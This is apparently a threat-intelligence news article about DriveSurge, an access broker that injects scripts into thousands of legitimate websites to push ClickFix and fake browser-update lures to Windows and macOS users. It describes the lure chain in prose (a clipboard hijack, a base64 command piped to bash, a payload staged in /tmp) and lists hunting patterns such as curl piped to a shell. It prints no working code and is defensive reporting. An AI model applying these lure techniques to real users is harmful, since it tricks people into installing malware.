DriveSurge — A Pay-Per-Install Access Broker Has Hijacked Thousands of Sites for ClickFix and Fake-Update Attacks

The old advice — don't visit sketchy websites — assumes the danger is the destination. DriveSurge breaks that assumption: it has turned thousands of ordinary, legitimate sites into the delivery channel, and built a business out of selling the infections.

RESTON, Va. — A threat actor that cybersecurity firm Silent Push has named DriveSurge has quietly hijacked thousands of legitimate websites and is using them to push malware to visitors through ClickFix and fake-update lures, according to research Silent Push published on May 30, 2026, reported by BleepingComputer and independently corroborated in part by Rapid7.

What sets DriveSurge apart, Silent Push says, is not a single clever exploit but the shape of the operation: it appears to run as a specialized Initial Access Broker on a Pay-Per-Install model — it gets paid each time a visitor's device is successfully infected, and the resulting access is sold on to other threat actors. The campaign had operated largely undetected, on infrastructure traced back to at least September 2025.

What Happened

Silent Push's Preemptive Cyber Defense team disclosed on May 30, 2026 that it had identified and named DriveSurge, a threat actor it describes as the primary driver behind a large surge in ClickFix and FakeUpdates drive-by campaigns. The firm's central finding is structural: DriveSurge appears to operate as a specialized Initial Access Broker using a Pay-Per-Install model, meaning it is paid each time it successfully infects a visitor's device and then supplies those compromised leads to downstream threat actors. BleepingComputer reported the research, and Silent Push notes that Rapid7 independently flagged part of the same infrastructure, lending the finding cross-vendor weight.

The mechanism is a Traffic Distribution System. DriveSurge injects hidden JavaScript into thousands of legitimate, high-reputation websites — without the owners' or visitors' knowledge — and uses an open-source TDS variant called zTDS, publicly available and in use since at least 2015, to profile each visitor and decide what to serve them. A visitor who lands on a compromised site is silently routed through zTDS and then shown one of two social-engineering lures. The first, FakeUpdates, is a convincing browser-update prompt; Silent Push found the underlying script can impersonate up to eleven browsers, including Chrome, Firefox, Edge, Safari, Opera, Brave, Yandex, Vivaldi, Samsung Internet and UC Browser. The second, ClickFix, is a fake error message that instructs the user to copy a 'fix' and paste it into their terminal or PowerShell window — where it installs malware. To map the operation, Silent Push developed eight technical fingerprints, identified roughly 82 malicious injection domains, and even surfaced seven pre-weaponized domains that had been registered but not yet used to serve injects.

An Access Broker, Not Just Another Malware Crew

The most important word in Silent Push's analysis is 'broker.' DriveSurge is assessed as an Initial Access Broker running a Pay-Per-Install business: it does not necessarily care what ultimately happens on an infected machine, because its product is the infection itself, sold on to whoever is buying. That framing matters for defenders because it explains the scale and the patience. An actor monetizing each install has a direct incentive to compromise as many high-traffic legitimate sites as possible and to keep the operation quiet for as long as possible — which is exactly what happened, with infrastructure traced to at least September 2025 and the campaign running largely undetected until now. It also means the eventual payload is not fixed: today it might be an infostealer, tomorrow a loader for ransomware, depending on which downstream customer bought the access. Treating DriveSurge as 'a malware family' understates it; it is a distribution layer in the criminal supply chain.

The Lure Is Cross-Platform, and macOS Is Squarely in Scope

It would be a mistake to file this as a Windows-and-PowerShell problem. Silent Push's analysis of an obfuscated DriveSurge payload led directly to macOS malware. The script first fingerprints the visitor, filtering specifically for desktop macOS users and excluding iPhones and iPads, so that the lure's instructions stay contextually plausible. macOS victims are shown a fake 'I'm not a robot' reCAPTCHA-style check; clicking it silently hijacks the clipboard, replacing its contents with a malicious command. A modal then tells the user to open Terminal and paste what they believe is a 'verification ID' — but the pasted command is a base64-encoded string piped to bash, which downloads a payload to /tmp, executes it, and deletes the dropper to minimize its forensic footprint. That cross-platform reach puts DriveSurge in the same lineage as the North Korean use of AppleScript and ClickFix on macOS The CyberSignal has covered, and it is a reminder that paste-into-Terminal social engineering is now a mature macOS attack technique, not a Windows curiosity.

Trusted Websites Are the Delivery Channel Now

DriveSurge is the named-operator anchor for a cluster The CyberSignal has tracked repeatedly: mass-website-compromise as a malware-distribution channel. It sits alongside the Ghost CMS flaw that hijacked 700 sites into a ClickFix campaign, the SymJack fake-installer and AI-chatbot SEO operation, the ACSC warning on ClickFix and the Vidar stealer hitting WordPress sites, and the WordPress plugin takeovers like the actively exploited Kirki flaw that hand attackers the kind of legitimate sites a TDS like zTDS then weaponizes. The through-line is that the historical defender heuristic — avoid suspicious destinations — is operationally inadequate when thousands of ordinary, reputable sites are simultaneously serving attacker payloads to the people who trust them. DriveSurge formalizes that reality into a tracked, commercial category.

Scope and Impact

The exposure is broad by design. Because DriveSurge compromises legitimate, high-reputation websites and routes their normal visitors, the potential victim population is simply 'people browsing the web' — there is no suspicious-link tell, no obviously sketchy domain, because the site genuinely is the local business or professional-services firm the user meant to visit. Silent Push's count of roughly 82 malicious injection domains and seven pre-weaponized ones is a snapshot of infrastructure, not a ceiling on victims; the compromised-site count runs to the thousands. Both Windows and macOS desktop users are in scope, and the fingerprinting logic deliberately excludes mobile so the social-engineering instructions land only where they are plausible.

The defensive scope question is about delivery and execution, not a single patch. There is no one CVE to close here — the entry points are many separately compromised sites, and the harm depends on the visitor actually running the payload. That means the high-leverage controls are the ones that break the chain at delivery (DNS and web-filtering against known DriveSurge and zTDS infrastructure) and at execution (preventing or alerting on user-pasted commands into PowerShell or Terminal). Silent Push has published indicators — injection-domain patterns, the zTDS 'jsrepo' resource pattern that Rapid7 also flagged, and specific payload and C2 addresses — that defenders can operationalize immediately into blocklists and hunts.

Response and Attribution

For SOC and threat-hunting teams, the immediate work is to ingest Silent Push's indicators and sweep the last several months of web-proxy, DNS and EDR telemetry against DriveSurge injection domains and the zTDS 'jsrepo?rnd=' resource pattern that Rapid7 independently noted. Hunt specifically for ClickFix execution: PowerShell or bash invocations triggered shortly after a user paste, with command lines matching common templates — curl piped to a shell, base64-decoded commands, downloads staged into temporary directories. On macOS, watch for the base64-to-bash pattern (a clipboard write immediately followed by a Terminal paste that curls a file into /tmp). Pivot on the published payload and C2 addresses to find any endpoints that already reached attacker infrastructure, and treat a hit as a confirmed infection given the access-broker model means a second-stage payload may already have been sold and deployed.

For CISOs and end-user security teams, the durable fix is layered and mostly about delivery and human behavior rather than a single product. Brief users concretely: any website prompt telling you to 'paste this command to fix the issue' or to complete a 'verification' in Terminal or PowerShell is malicious, no matter how legitimate or familiar the site looks — and that warning must explicitly cover Mac users, who are squarely targeted. Restrict PowerShell execution for non-administrative users where feasible, since ClickFix depends on the victim's ability to run pasted commands, and consider equivalent guardrails on managed Macs. Lean on DNS-level filtering and web-content controls to blunt both the compromised-site redirects and the fake-update downloads. The board-level framing is that mass-website compromise is now run by commercial access brokers as a paid service, so 'we only visit reputable sites' is no longer a meaningful control — the reputable sites are the channel.

The CyberSignal Analysis

Signal 01 — The Product Is Access, So the Payload Is a Moving Target

The single most consequential detail is the business model. An Initial Access Broker on a Pay-Per-Install footing is not building toward one objective; it is wholesaling infections to whoever pays. That has two practical implications for defenders. First, the eventual payload on a DriveSurge-infected machine is whatever the downstream buyer wanted — an infostealer this week, a ransomware loader next — so incident responders should not assume the malware they find first is the whole story. Second, the broker's incentives reward breadth and stealth, which is why the operation spread across thousands of sites and ran undetected for months. You defend against an access broker by attacking its economics: break the delivery and execution chain reliably enough that the install rate, and therefore the revenue, collapses.

Signal 02 — Off-the-Shelf Infrastructure Lowers the Bar

DriveSurge's engine, zTDS, is not bespoke — it is an open-source traffic distribution system that has been around since at least 2015 and is publicly available. That matters because it means this capability is not gated behind elite tooling; a TDS, a list of compromised sites, and a couple of lure scripts are enough to run a scaled drive-by operation. The good news, mirrored in Silent Push's method, is that commodity infrastructure also produces commodity fingerprints: reused file-naming patterns, the 'jsrepo' resource string, shared registrars and bulletproof hosts, and dedicated registration emails all give defenders durable trackable signatures. The same off-the-shelf nature that lowers the attacker's bar also gives the defender repeatable detection — which is exactly why cross-vendor corroboration from Rapid7 was possible.

Signal 03 — Paste-Into-Terminal Is a Cross-Platform Human Exploit

ClickFix works because it converts a security ritual into an attack: the user thinks they are passing a check or applying a fix, and instead they run the attacker's command with their own hands. DriveSurge shows this is no longer Windows-specific — the macOS variant dresses the same trick up as a reCAPTCHA and a clipboard hijack. There is no patch for a user voluntarily pasting a command into a shell, which is why the most effective controls are a mix of removing the capability (restricting PowerShell and shell access for users who do not need it), interrupting the delivery (DNS and content filtering), and training that names the specific pattern. The mental model defenders should instill is blunt: legitimate websites and CAPTCHAs never ask you to open a terminal.

Sources